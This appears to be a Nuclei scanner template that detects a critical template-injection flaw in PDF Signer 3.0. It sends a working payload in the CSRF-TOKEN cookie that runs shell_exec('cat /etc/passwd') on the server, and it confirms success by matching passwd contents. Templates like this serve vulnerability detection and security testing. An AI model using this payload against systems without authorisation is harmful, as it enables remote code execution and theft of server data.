id: pdf-signer-ssti-to-rce

info:
  name: PDF Signer 3.0 - Template Injection
  author: madrobot
  severity: critical
  description: PDF Signer 3.0 is susceptible to a template injection which allows code execution, due to improper cookie handling and an improper CSRF implementation. An attacker can execute code on the server in the context of the web server.
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cwe-id: CWE-1336
  metadata:
    max-request: 1
  tags: ssti,rce,csrf

http:
  - method: GET
    path:
      - "{{BaseURL}}"

    headers:
      Cookie: "CSRF-TOKEN=rnqvt{{shell_exec('cat /etc/passwd')}}to5gw; simcify=uv82sg0jj2oqa0kkr2virls4dl"
    skip-variables-check: true

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200

      - type: regex
        regex:
          - "root:.*:0:0:"
        part: body

# digest: 490a004630440220346f42ec245dba5a5da138043cc2f9e8f3e5979db4c9db118d907d6c5dbbc44602203f58036f592e1767eb81a87cdf8169f704f3715b094ef1cadbf36dba96651657:922c64590222798bb761d5b6d8e72950